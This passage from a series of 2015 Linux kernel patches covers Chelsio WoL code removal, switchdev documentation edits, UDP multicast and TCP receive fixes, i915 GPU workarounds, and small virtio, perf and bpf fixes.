port_cfg_reg, MAGICEN_F, - addr ? MAGICEN_F : 0); -} - -/** - * t4_wol_pat_enable - enable/disable pattern-based WoL - * @adap: the adapter - * @port: the physical port index - * @map: bitmap of which HW pattern filters to set - * @mask0: byte mask for bytes 0-63 of a packet - * @mask1: byte mask for bytes 64-127 of a packet - * @crc: Ethernet CRC for selected bytes - * @enable: enable/disable switch - * - * Sets the pattern filters indicated in @map to mask out the bytes - * specified in @mask0/@mask1 in received packets and compare the CRC of - * the resulting packet against @crc. If @enable is %true pattern-based - * WoL is enabled, otherwise disabled. - */ -int t4_wol_pat_enable(struct adapter *adap, unsigned int port, unsigned int map, - u64 mask0, u64 mask1, unsigned int crc, bool enable) -{ - int i; - u32 port_cfg_reg; - - if (is_t4(adap->params.chip)) - port_cfg_reg = PORT_REG(port, XGMAC_PORT_CFG2_A); - else - port_cfg_reg = T5_PORT_REG(port, MAC_PORT_CFG2_A); - - if (!enable) { - t4_set_reg_field(adap, port_cfg_reg, PATEN_F, 0); - return 0; - } - if (map > 0xff) - return -EINVAL; - -#define EPIO_REG(name) \ - (is_t4(adap->params.chip) ? 
\ - PORT_REG(port, XGMAC_PORT_EPIO_##name##_A) : \ - T5_PORT_REG(port, MAC_PORT_EPIO_##name##_A)) - - t4_write_reg(adap, EPIO_REG(DATA1), mask0 >> 32); - t4_write_reg(adap, EPIO_REG(DATA2), mask1); - t4_write_reg(adap, EPIO_REG(DATA3), mask1 >> 32); - - for (i = 0; i < NWOL_PAT; i++, map >>= 1) { - if (!(map & 1)) - continue; - - /* write byte masks */ - t4_write_reg(adap, EPIO_REG(DATA0), mask0); - t4_write_reg(adap, EPIO_REG(OP), ADDRESS_V(i) | EPIOWR_F); - t4_read_reg(adap, EPIO_REG(OP)); /* flush */ - if (t4_read_reg(adap, EPIO_REG(OP)) & SF_BUSY_F) - return -ETIMEDOUT; - - /* write CRC */ - t4_write_reg(adap, EPIO_REG(DATA0), crc); - t4_write_reg(adap, EPIO_REG(OP), ADDRESS_V(i + 32) | EPIOWR_F); - t4_read_reg(adap, EPIO_REG(OP)); /* flush */ - if (t4_read_reg(adap, EPIO_REG(OP)) & SF_BUSY_F) - return -ETIMEDOUT; - } -#undef EPIO_REG - - t4_set_reg_field(adap, PORT_REG(port, XGMAC_PORT_CFG2_A), 0, PATEN_F); - return 0; -} - /* t4_mk_filtdelwr - create a delete filter WR * @ftid: the filter ID * @wr: the filter work request to populate diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.h b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.h index 88067d90121c..f9a2cb164737 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.h @@ -52,8 +52,6 @@ enum { MBOX_LEN = 64, /* mailbox size in bytes */ TRACE_LEN = 112, /* length of trace data and mask */ FILTER_OPT_LEN = 36, /* filter tuple width for optional components */ - NWOL_PAT = 8, /* # of WoL patterns */ - WOL_PAT_LEN = 128, /* length of WoL patterns */ }; enum { From f5ed2febda3ae51cc382a1341381506cec09248b Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Wed, 3 Jun 2015 20:43:40 -0700 Subject: [PATCH 680/872] switchdev: documentation: fix longer-than-80-char lines Signed-off-by: Scott Feldman Acked-by: Jiri Pirko Signed-off-by: David S. Miller --- Documentation/networking/switchdev.txt | 36 +++++++++++++------------- 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/Documentation/networking/switchdev.txt b/Documentation/networking/switchdev.txt index 616f89267d23..5061d6e12e2f 100644 --- a/Documentation/networking/switchdev.txt +++ b/Documentation/networking/switchdev.txt @@ -114,11 +114,11 @@ would be sub-port 0 on port 1 on switch 1. Switch ID ^^^^^^^^^ -The switchdev driver must implement the switchdev op switchdev_port_attr_get for -SWITCHDEV_ATTR_PORT_PARENT_ID for each port netdev, returning the same physical ID -for each port of a switch. The ID must be unique between switches on the same -system. The ID does not need to be unique between switches on different -systems. +The switchdev driver must implement the switchdev op switchdev_port_attr_get +for SWITCHDEV_ATTR_PORT_PARENT_ID for each port netdev, returning the same +physical ID for each port of a switch. The ID must be unique between switches +on the same system. The ID does not need to be unique between switches on +different systems. The switch ID is used to locate ports on a switch and to know if aggregated ports belong to the same switch. @@ -194,11 +194,11 @@ in turn, will notify the bridge driver using the switchdev notifier call: err = call_switchdev_notifiers(val, dev, info); -Where val is SWITCHDEV_FDB_ADD when learning and SWITCHDEV_FDB_DEL when forgetting, and -info points to a struct switchdev_notifier_fdb_info. On SWITCHDEV_FDB_ADD, the bridge -driver will install the FDB entry into the bridge's FDB and mark the entry as -NTF_EXT_LEARNED. 
The iproute2 bridge command will label these entries -"offload": +Where val is SWITCHDEV_FDB_ADD when learning and SWITCHDEV_FDB_DEL when +forgetting, and info points to a struct switchdev_notifier_fdb_info. On +SWITCHDEV_FDB_ADD, the bridge driver will install the FDB entry into the +bridge's FDB and mark the entry as NTF_EXT_LEARNED. The iproute2 bridge +command will label these entries "offload": $ bridge fdb 52:54:00:12:35:01 dev sw1p1 master br0 permanent @@ -229,18 +229,18 @@ the bridge's FDB. It's possible, but not optimal, to enable learning on the device port and on the bridge port, and disable learning_sync. To support learning and learning_sync port attributes, the driver implements -switchdev op switchdev_port_attr_get/set for SWITCHDEV_ATTR_PORT_BRIDGE_FLAGS. The driver -should initialize the attributes to the hardware defaults. +switchdev op switchdev_port_attr_get/set for SWITCHDEV_ATTR_PORT_BRIDGE_FLAGS. +The driver should initialize the attributes to the hardware defaults. FDB Ageing ^^^^^^^^^^ There are two FDB ageing models supported: 1) ageing by the device, and 2) ageing by the kernel. Ageing by the device is preferred if many FDB entries -are supported. The driver calls call_switchdev_notifiers(SWITCHDEV_FDB_DEL, ...) to -age out the FDB entry. In this model, ageing by the kernel should be turned -off. XXX: how to turn off ageing in kernel on a per-port basis or otherwise -prevent the kernel from ageing out the FDB entry? +are supported. The driver calls call_switchdev_notifiers(SWITCHDEV_FDB_DEL, +...) to age out the FDB entry. In this model, ageing by the kernel should be +turned off. XXX: how to turn off ageing in kernel on a per-port basis or +otherwise prevent the kernel from ageing out the FDB entry? In the kernel ageing model, the standard bridge ageing mechanism is used to age out stale FDB entries. To keep an FDB entry "alive", the driver should refresh @@ -262,8 +262,8 @@ STP State Change on Port Internally or with a third-party STP protocol implementation (e.g. mstpd), the bridge driver maintains the STP state for ports, and will notify the switch -driver of STP state change on a port using the switchdev op switchdev_attr_port_set for -SWITCHDEV_ATTR_PORT_STP_UPDATE. +driver of STP state change on a port using the switchdev op +switchdev_attr_port_set for SWITCHDEV_ATTR_PORT_STP_UPDATE. State is one of BR_STATE_*. The switch driver can use STP state updates to update ingress packet filter list for the port. For example, if port is From d290f1fc7092814ee0e14b80ad09b06af7bd3484 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Wed, 3 Jun 2015 20:43:41 -0700 Subject: [PATCH 681/872] switchdev: documentation: fix grammer error Signed-off-by: Scott Feldman Acked-by: Jiri Pirko Signed-off-by: David S. Miller --- Documentation/networking/switchdev.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Documentation/networking/switchdev.txt b/Documentation/networking/switchdev.txt index 5061d6e12e2f..0554b68e1fab 100644 --- a/Documentation/networking/switchdev.txt +++ b/Documentation/networking/switchdev.txt @@ -142,7 +142,7 @@ The port netdevs representing the physical switch ports can be organized into higher-level switching constructs. The default construct is a standalone router port, used to offload L3 forwarding. Two or more ports can be bonded together to form a LAG. Two or more ports (or LAGs) can be bridged to bridge -to L2 networks. VLANs can be applied to sub-divide L2 networks. L2-over-L3 +L2 networks. 
VLANs can be applied to sub-divide L2 networks. L2-over-L3 tunnels can be built on ports. These constructs are built using standard Linux tools such as the bridge driver, the bonding/team drivers, and netlink-based tools such as iproute2. From 4b5364fbdce7e4b947e6e76d7341675ea2e12f4d Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Wed, 3 Jun 2015 20:43:42 -0700 Subject: [PATCH 682/872] switchdev: documentation: for static FDB ops, use switchdev_port_fdb_xxx ops Signed-off-by: Scott Feldman Acked-by: Jiri Pirko Signed-off-by: David S. Miller --- Documentation/networking/switchdev.txt | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Documentation/networking/switchdev.txt b/Documentation/networking/switchdev.txt index 0554b68e1fab..00c703ce6903 100644 --- a/Documentation/networking/switchdev.txt +++ b/Documentation/networking/switchdev.txt @@ -177,6 +177,10 @@ entries are installed, for example, using iproute2 bridge cmd: bridge fdb add ADDR dev DEV [vlan VID] [self] +The driver should use the helper switchdev_port_fdb_xxx ops for ndo_fdb_xxx +ops, and handle add/delete/dump of SWITCHDEV_OBJ_PORT_FDB object using +switchdev_port_obj_xxx ops. + XXX: what should be done if offloading this rule to hardware fails (for example, due to full capacity in hardware tables) ? From 7616dcbb212eeec00c9bcc0fecb953fdee60634c Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Wed, 3 Jun 2015 20:43:43 -0700 Subject: [PATCH 683/872] switchdev: documentation: use switchdev_port_obj_xxx for IPv4 FIB add/modify/delete ops Clarify in documentation and code that IPV4 FIB add operation is used for both adding a new FIB entry to the device and for modifying an existing FIB entry on the device. Also, remove left-over references to ipv4_fib ops and replace with details on SWITCHDEV_PORT_IPV4_FIB object. Signed-off-by: Scott Feldman Acked-by: Jiri Pirko Signed-off-by: David S. Miller --- Documentation/networking/switchdev.txt | 53 ++++++++++++++------------ net/switchdev/switchdev.c | 4 +- 2 files changed, 31 insertions(+), 26 deletions(-) diff --git a/Documentation/networking/switchdev.txt b/Documentation/networking/switchdev.txt index 00c703ce6903..da82cd75a4f6 100644 --- a/Documentation/networking/switchdev.txt +++ b/Documentation/networking/switchdev.txt @@ -300,33 +300,38 @@ IGMP Snooping XXX: complete this section -L3 routing ----------- +L3 Routing Offload +------------------ Offloading L3 routing requires that device be programmed with FIB entries from the kernel, with the device doing the FIB lookup and forwarding. The device does a longest prefix match (LPM) on FIB entries matching route prefix and -forwards the packet to the matching FIB entry's nexthop(s) egress ports. To -program the device, the switchdev driver is called with add/delete ops for IPv4 -and IPv6 FIB entries. For IPv4, the driver implements switchdev ops: - - int (*switchdev_fib_ipv4_add)(struct net_device *dev, - __be32 dst, int dst_len, - struct fib_info *fi, - u8 tos, u8 type, - u32 nlflags, u32 tb_id); - - int (*switchdev_fib_ipv4_del)(struct net_device *dev, - __be32 dst, int dst_len, - struct fib_info *fi, - u8 tos, u8 type, - u32 tb_id); - -to add/delete IPv4 dst/dest_len prefix on table tb_id. The *fi structure holds -details on the route and route's nexthops. *dev is one of the port netdevs -mentioned in the routes next hop list. If the output port netdevs referenced -in the route's nexthop list don't all have the same switch ID, the driver is -not called to add/delete the FIB entry. 
+forwards the packet to the matching FIB entry's nexthop(s) egress ports. + +To program the device, the driver implements support for +SWITCHDEV_OBJ_IPV[4|6]_FIB object using switchdev_port_obj_xxx ops. +switchdev_port_obj_add is used for both adding a new FIB entry to the device, +or modifying an existing entry on the device. + +XXX: Currently, only SWITCHDEV_OBJ_IPV4_FIB objects are supported. + +SWITCHDEV_OBJ_IPV4_FIB object passes: + + struct switchdev_obj_ipv4_fib { /* IPV4_FIB */ + u32 dst; + int dst_len; + struct fib_info *fi; + u8 tos; + u8 type; + u32 nlflags; + u32 tb_id; + } ipv4_fib; + +to add/modify/delete IPv4 dst/dest_len prefix on table tb_id. The *fi +structure holds details on the route and route's nexthops. *dev is one of the +port netdevs mentioned in the routes next hop list. If the output port netdevs +referenced in the route's nexthop list don't all have the same switch ID, the +driver is not called to add/modify/delete the FIB entry. Routes offloaded to the device are labeled with "offload" in the ip route listing: @@ -344,7 +349,7 @@ listing: 12.0.0.4 via 11.0.0.9 dev sw1p2 proto zebra metric 20 offload 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.15 -XXX: add/del IPv6 FIB API +XXX: add/mod/del IPv6 FIB API Nexthop Resolution ^^^^^^^^^^^^^^^^^^ diff --git a/net/switchdev/switchdev.c b/net/switchdev/switchdev.c index ac853acbe211..e008057dab46 100644 --- a/net/switchdev/switchdev.c +++ b/net/switchdev/switchdev.c @@ -803,7 +803,7 @@ static struct net_device *switchdev_get_dev_by_nhs(struct fib_info *fi) } /** - * switchdev_fib_ipv4_add - Add IPv4 route entry to switch + * switchdev_fib_ipv4_add - Add/modify switch IPv4 route entry * * @dst: route's IPv4 destination address * @dst_len: destination address length (prefix length) @@ -813,7 +813,7 @@ static struct net_device *switchdev_get_dev_by_nhs(struct fib_info *fi) * @nlflags: netlink flags passed in (NLM_F_*) * @tb_id: route table ID * - * Add IPv4 route entry to switch device. + * Add/modify switch IPv4 route entry. */ int switchdev_fib_ipv4_add(u32 dst, int dst_len, struct fib_info *fi, u8 tos, u8 type, u32 nlflags, u32 tb_id) From 6e540309326188f769e03bb4c6dd8ff6752930c2 Mon Sep 17 00:00:00 2001 From: Shawn Bohrer Date: Wed, 3 Jun 2015 16:27:38 -0500 Subject: [PATCH 684/872] ipv4/udp: Verify multicast group is ours in upd_v4_early_demux() 421b3885bf6d56391297844f43fb7154a6396e12 "udp: ipv4: Add udp early demux" introduced a regression that allowed sockets bound to INADDR_ANY to receive packets from multicast groups that the socket had not joined. For example a socket that had joined 224.168.2.9 could also receive packets from 225.168.2.9 despite not having joined that group if ip_early_demux is enabled. Fix this by calling ip_check_mc_rcu() in udp_v4_early_demux() to verify that the multicast packet is indeed ours. Signed-off-by: Shawn Bohrer Reported-by: Yurij M. Plotnikov Signed-off-by: David S. 
Miller --- net/ipv4/udp.c | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c index 1c92ea67baef..83aa604f9273 100644 --- a/net/ipv4/udp.c +++ b/net/ipv4/udp.c @@ -90,6 +90,7 @@ #include #include #include +#include #include #include #include @@ -1960,6 +1961,7 @@ void udp_v4_early_demux(struct sk_buff *skb) struct sock *sk; struct dst_entry *dst; int dif = skb->dev->ifindex; + int ours; /* validate the packet */ if (!pskb_may_pull(skb, skb_transport_offset(skb) + sizeof(struct udphdr))) @@ -1969,14 +1971,24 @@ void udp_v4_early_demux(struct sk_buff *skb) uh = udp_hdr(skb); if (skb->pkt_type == PACKET_BROADCAST || - skb->pkt_type == PACKET_MULTICAST) + skb->pkt_type == PACKET_MULTICAST) { + struct in_device *in_dev = __in_dev_get_rcu(skb->dev); + + if (!in_dev) + return; + + ours = ip_check_mc_rcu(in_dev, iph->daddr, iph->saddr, + iph->protocol); + if (!ours) + return; sk = __udp4_lib_mcast_demux_lookup(net, uh->dest, iph->daddr, uh->source, iph->saddr, dif); - else if (skb->pkt_type == PACKET_HOST) + } else if (skb->pkt_type == PACKET_HOST) { sk = __udp4_lib_demux_lookup(net, uh->dest, iph->daddr, uh->source, iph->saddr, dif); - else + } else { return; + } if (!sk) return; From 12e25e1041d044d4204f2b7c54695e14e8ffb282 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 3 Jun 2015 23:49:21 -0700 Subject: [PATCH 685/872] tcp: remove redundant checks tcp_v4_rcv() checks the following before calling tcp_v4_do_rcv(): if (th->doff < sizeof(struct tcphdr) / 4) goto bad_packet; if (!pskb_may_pull(skb, th->doff * 4)) goto discard_it; So following check in tcp_v4_do_rcv() is redundant and "goto csum_err;" is wrong anyway. if (skb->len < tcp_hdrlen(skb) || ...) goto csum_err; A second check can be removed after no_tcp_socket label for same reason. Same tests can be removed in tcp_v6_do_rcv() Note : short tcp frames are not properly accounted in tcpInErrs MIB, because pskb_may_pull() failure simply drops incoming skb, we might fix this in a separate patch. Signed-off-by: Eric Dumazet Signed-off-by: David S. 
Miller --- net/ipv4/tcp_ipv4.c | 4 ++-- net/ipv6/tcp_ipv6.c | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c index feb875769b8d..3130c42240c8 100644 --- a/net/ipv4/tcp_ipv4.c +++ b/net/ipv4/tcp_ipv4.c @@ -1400,7 +1400,7 @@ int tcp_v4_do_rcv(struct sock *sk, struct sk_buff *skb) return 0; } - if (skb->len < tcp_hdrlen(skb) || tcp_checksum_complete(skb)) + if (tcp_checksum_complete(skb)) goto csum_err; if (sk->sk_state == TCP_LISTEN) { @@ -1647,7 +1647,7 @@ int tcp_v4_rcv(struct sk_buff *skb) if (!xfrm4_policy_check(NULL, XFRM_POLICY_IN, skb)) goto discard_it; - if (skb->len < (th->doff << 2) || tcp_checksum_complete(skb)) { + if (tcp_checksum_complete(skb)) { csum_error: TCP_INC_STATS_BH(net, TCP_MIB_CSUMERRORS); bad_packet: diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c index 7be3d858cbf0..b72e1ffc6bb4 100644 --- a/net/ipv6/tcp_ipv6.c +++ b/net/ipv6/tcp_ipv6.c @@ -1250,7 +1250,7 @@ static int tcp_v6_do_rcv(struct sock *sk, struct sk_buff *skb) return 0; } - if (skb->len < tcp_hdrlen(skb) || tcp_checksum_complete(skb)) + if (tcp_checksum_complete(skb)) goto csum_err; if (sk->sk_state == TCP_LISTEN) { @@ -1442,7 +1442,7 @@ static int tcp_v6_rcv(struct sk_buff *skb) tcp_v6_fill_cb(skb, hdr, th); - if (skb->len < (th->doff<<2) || tcp_checksum_complete(skb)) { + if (tcp_checksum_complete(skb)) { csum_error: TCP_INC_STATS_BH(net, TCP_MIB_CSUMERRORS); bad_packet: From c39c4c6abb89d24454b63798ccbae12b538206a5 Mon Sep 17 00:00:00 2001 From: Wei Liu Date: Wed, 3 Jun 2015 11:10:42 +0100 Subject: [PATCH 686/872] tcp: double default TSQ output bytes limit Xen virtual network driver has higher latency than a physical NIC. Having only 128K as limit for TSQ introduced 30% regression in guest throughput. This patch raises the limit to 256K. This reduces the regression to 8%. This buys us more time to work out a proper solution in the long run. Signed-off-by: Wei Liu Cc: David Miller Cc: Eric Dumazet Acked-by: Eric Dumazet Signed-off-by: David S. Miller --- net/ipv4/tcp_output.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c index 190538a2a88c..eeb59befaf06 100644 --- a/net/ipv4/tcp_output.c +++ b/net/ipv4/tcp_output.c @@ -50,8 +50,8 @@ int sysctl_tcp_retrans_collapse __read_mostly = 1; */ int sysctl_tcp_workaround_signed_windows __read_mostly = 0; -/* Default TSQ limit of two TSO segments */ -int sysctl_tcp_limit_output_bytes __read_mostly = 131072; +/* Default TSQ limit of four TSO segments */ +int sysctl_tcp_limit_output_bytes __read_mostly = 262144; /* This limits the percentage of the congestion window which we * will allow a single TSO frame to consume. Building TSO frames From 2e5356da370e36ba7aab39d2800c7a2412630ae7 Mon Sep 17 00:00:00 2001 From: Arun Siluvery Date: Tue, 2 Jun 2015 20:06:59 +0100 Subject: [PATCH 687/872] drm/i915: Initialize HWS page address after GPU reset MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit After GPU reset, HW is losing the address of HWS page in the register. The page itself is valid except that HW is not aware of its location. 
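Concretely, the address the hardware loses is the one programmed into the per-ring RING_HWS_PGA register. A minimal sketch of restoring it from the driver's saved status page (this mirrors the hunk added to gen8_init_common_ring() further below, assuming ring->status_page.gfx_addr still holds the valid offset):

	if (ring->status_page.obj) {
		/* Re-program the HWS page address the HW lost across reset */
		I915_WRITE(RING_HWS_PGA(ring->mmio_base),
			   (u32)ring->status_page.gfx_addr);
		/* Posting read so the register write is flushed to the HW */
		POSTING_READ(RING_HWS_PGA(ring->mmio_base));
	}

Until that register is rewritten, the reported HWS page address stays at zero, as in the errors below: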
[ 64.368623] [drm:gen8_init_common_ring [i915]] *ERROR* HWS Page address = 0x00000000 [ 64.368655] [drm:gen8_init_common_ring [i915]] *ERROR* HWS Page address = 0x00000000 [ 64.368681] [drm:gen8_init_common_ring [i915]] *ERROR* HWS Page address = 0x00000000 [ 64.368704] [drm:gen8_init_common_ring [i915]] *ERROR* HWS Page address = 0x00000000 This patch reloads this value into the register during ring init. Signed-off-by: Arun Siluvery Reviewed-by: Ville Syrjälä Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_lrc.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/gpu/drm/i915/intel_lrc.c b/drivers/gpu/drm/i915/intel_lrc.c index 09df74b8e917..424e62197787 100644 --- a/drivers/gpu/drm/i915/intel_lrc.c +++ b/drivers/gpu/drm/i915/intel_lrc.c @@ -1134,6 +1134,12 @@ static int gen8_init_common_ring(struct intel_engine_cs *ring) I915_WRITE_IMR(ring, ~(ring->irq_enable_mask | ring->irq_keep_mask)); I915_WRITE(RING_HWSTAM(ring->mmio_base), 0xffffffff); + if (ring->status_page.obj) { + I915_WRITE(RING_HWS_PGA(ring->mmio_base), + (u32)ring->status_page.gfx_addr); + POSTING_READ(RING_HWS_PGA(ring->mmio_base)); + } + I915_WRITE(RING_MODE_GEN7(ring), _MASKED_BIT_DISABLE(GFX_REPLAY_MODE) | _MASKED_BIT_ENABLE(GFX_RUN_LIST_ENABLE)); From 77b64555f8ddf28d99b4cc19ef4a56b6df39cd81 Mon Sep 17 00:00:00 2001 From: Ander Conselvan de Oliveira Date: Tue, 2 Jun 2015 14:17:47 +0300 Subject: [PATCH 688/872] drm/i915: Include G4X/VLV/CHV in self refresh status MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Add all missing platforms handled by intel_set_memory_cxsr() to the i915_sr_status debugfs entry. v2: Add G4X too. (Ville) Clarify the change also affects CHV. (Ander) References: https://bugs.freedesktop.org/show_bug.cgi?id=89792 Signed-off-by: Ander Conselvan de Oliveira Reviewed-by: Ville Syrjälä Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/i915_debugfs.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/gpu/drm/i915/i915_debugfs.c b/drivers/gpu/drm/i915/i915_debugfs.c index 007c7d7d8295..dc55c51964ab 100644 --- a/drivers/gpu/drm/i915/i915_debugfs.c +++ b/drivers/gpu/drm/i915/i915_debugfs.c @@ -1667,12 +1667,15 @@ static int i915_sr_status(struct seq_file *m, void *unused) if (HAS_PCH_SPLIT(dev)) sr_enabled = I915_READ(WM1_LP_ILK) & WM1_LP_SR_EN; - else if (IS_CRESTLINE(dev) || IS_I945G(dev) || IS_I945GM(dev)) + else if (IS_CRESTLINE(dev) || IS_G4X(dev) || + IS_I945G(dev) || IS_I945GM(dev)) sr_enabled = I915_READ(FW_BLC_SELF) & FW_BLC_SELF_EN; else if (IS_I915GM(dev)) sr_enabled = I915_READ(INSTPM) & INSTPM_SELF_EN; else if (IS_PINEVIEW(dev)) sr_enabled = I915_READ(DSPFW3) & PINEVIEW_SELF_REFRESH_EN; + else if (IS_VALLEYVIEW(dev)) + sr_enabled = I915_READ(FW_BLC_SELF_VLV) & FW_CSPWRDWNEN; intel_runtime_pm_put(dev_priv); From 4f47c99a9be7e9b90a7f3c2c4599ea6b7c2ec49d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ville=20Syrj=C3=A4l=C3=A4?= Date: Tue, 2 Jun 2015 15:37:35 +0300 Subject: [PATCH 689/872] drm/i915: Move WaBarrierPerformanceFixDisable:skl to skl code from chv code MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 65ca7514e21adbee25b8175fc909759c735d00ff Author: Damien Lespiau Date: Mon Feb 9 19:33:22 2015 +0000 drm/i915/skl: Implement WaBarrierPerformanceFixDisable got misapplied and the code landed in chv_init_workarounds() instead of the intended skl_init_workarounds(). Move it over to the right place. 
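For reference, the relocated block is the stepping-gated workaround shown in the diff below; after the move it lives in skl_init_workarounds(), roughly:

	/* Apply WaBarrierPerformanceFixDisable only on SKL C0/D0 steppings */
	if (INTEL_REVID(dev) == SKL_REVID_C0 ||
	    INTEL_REVID(dev) == SKL_REVID_D0)
		WA_SET_BIT_MASKED(HDC_CHICKEN0,
				  HDC_FENCE_DEST_SLM_DISABLE |
				  HDC_BARRIER_PERFORMANCE_DISABLE);

Sitting in chv_init_workarounds(), which presumably only runs on Cherryview, the SKL revision checks could never match an actual Skylake part, so the workaround did not take effect where it was intended.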
Cc: Damien Lespiau Signed-off-by: Ville Syrjälä Reviewed-by: Damien Lespiau Reviewed-by: Ben Widawsky Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_ringbuffer.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/gpu/drm/i915/intel_ringbuffer.c b/drivers/gpu/drm/i915/intel_ringbuffer.c index 441e2502b889..005b5e04de4d 100644 --- a/drivers/gpu/drm/i915/intel_ringbuffer.c +++ b/drivers/gpu/drm/i915/intel_ringbuffer.c @@ -901,13 +901,6 @@ static int chv_init_workarounds(struct intel_engine_cs *ring) GEN6_WIZ_HASHING_MASK, GEN6_WIZ_HASHING_16x4); - if (INTEL_REVID(dev) == SKL_REVID_C0 || - INTEL_REVID(dev) == SKL_REVID_D0) - /* WaBarrierPerformanceFixDisable:skl */ - WA_SET_BIT_MASKED(HDC_CHICKEN0, - HDC_FENCE_DEST_SLM_DISABLE | - HDC_BARRIER_PERFORMANCE_DISABLE); - return 0; } @@ -1024,6 +1017,13 @@ static int skl_init_workarounds(struct intel_engine_cs *ring) WA_SET_BIT_MASKED(HIZ_CHICKEN, BDW_HIZ_POWER_COMPILER_CLOCK_GATING_DISABLE); + if (INTEL_REVID(dev) == SKL_REVID_C0 || + INTEL_REVID(dev) == SKL_REVID_D0) + /* WaBarrierPerformanceFixDisable:skl */ + WA_SET_BIT_MASKED(HDC_CHICKEN0, + HDC_FENCE_DEST_SLM_DISABLE | + HDC_BARRIER_PERFORMANCE_DISABLE); + return skl_tune_iz_hashing(ring); } From 210d150e1f5da506875e376422ba31ead2d49621 Mon Sep 17 00:00:00 2001 From: Jiang Liu Date: Thu, 4 Jun 2015 16:41:44 +0800 Subject: [PATCH 690/872] virtio_pci: Clear stale cpumask when setting irq affinity The cpumask vp_dev->msix_affinity_masks[info->msix_vector] may contain staled information when vp_set_vq_affinity() gets called, so clear it before setting the new cpu bit mask. Cc: stable@vger.kernel.org Signed-off-by: Jiang Liu Signed-off-by: Michael S. Tsirkin --- drivers/virtio/virtio_pci_common.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/virtio/virtio_pci_common.c b/drivers/virtio/virtio_pci_common.c index e894eb278d83..eba1b7ac7294 100644 --- a/drivers/virtio/virtio_pci_common.c +++ b/drivers/virtio/virtio_pci_common.c @@ -423,6 +423,7 @@ int vp_set_vq_affinity(struct virtqueue *vq, int cpu) if (cpu == -1) irq_set_affinity_hint(irq, NULL); else { + cpumask_clear(mask); cpumask_set_cpu(cpu, mask); irq_set_affinity_hint(irq, mask); } From b44a2b53becf2485f484bd6bb6c1d963ebc339f8 Mon Sep 17 00:00:00 2001 From: Alexander Shishkin Date: Thu, 4 Jun 2015 16:31:47 +0300 Subject: [PATCH 691/872] perf/x86/intel/pt: Fix a refactoring bug Commit 066450be41 ("perf/x86/intel/pt: Clean up the control flow in pt_pmu_hw_init()") changed attribute initialization so that only the first attribute gets initialized using sysfs_attr_init(), which upsets lockdep. This patch fixes the glitch so that all allocated attributes are properly initialized thus fixing the lockdep warning reported by Tvrtko and Imre. Reported-by: Tvrtko Ursulin Reported-by: Imre Deak Signed-off-by: Alexander Shishkin Cc: Cc: Andrew Morton Cc: H. 
Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event_intel_pt.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/x86/kernel/cpu/perf_event_intel_pt.c b/arch/x86/kernel/cpu/perf_event_intel_pt.c index 5b804f96ad66..123ff1bb2f60 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_pt.c +++ b/arch/x86/kernel/cpu/perf_event_intel_pt.c @@ -151,7 +151,7 @@ static int __init pt_pmu_hw_init(void) de_attr->attr.attr.name = pt_caps[i].name; - sysfs_attr_init(&de_attrs->attr.attr); + sysfs_attr_init(&de_attr->attr.attr); de_attr->attr.attr.mode = S_IRUGO; de_attr->attr.show = pt_cap_show; From 94db13fe5ff144ea5afcfa3a3daf38a239090acf Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Thu, 4 Jun 2015 08:33:48 -0700 Subject: [PATCH 692/872] bpf: fix build due to missing tc_verd fix build error: net/core/filter.c: In function 'bpf_clone_redirect': net/core/filter.c:1429:18: error: 'struct sk_buff' has no member named 'tc_verd' if (G_TC_AT(skb2->tc_verd) & AT_INGRESS) Fixes: 3896d655f4d4 ("bpf: introduce bpf_clone_redirect() helper") Reported-by: Or Gerlitz Reported-by: Fengguang Wu Signed-off-by: Alexei Starovoitov Signed-off-by: David S. Miller --- net/core/filter.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/net/core/filter.c b/net/core/filter.c index 64c121c09655..09b2062eb5b8 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -46,7 +46,6 @@ #include #include #include -#include /** * sk_filter - run a packet through a socket filter @@ -1426,8 +1425,7 @@ static u64 bpf_clone_redirect(u64 r1, u64 ifindex, u64 flags, u64 r4, u64 r5) if (unlikely(!skb2)) return -ENOMEM; - if (G_TC_AT(skb2->tc_verd) & AT_INGRESS) - skb_push(skb2, skb2->mac_len); + skb_push(skb2, skb2->data - skb_mac_header(skb2)); if 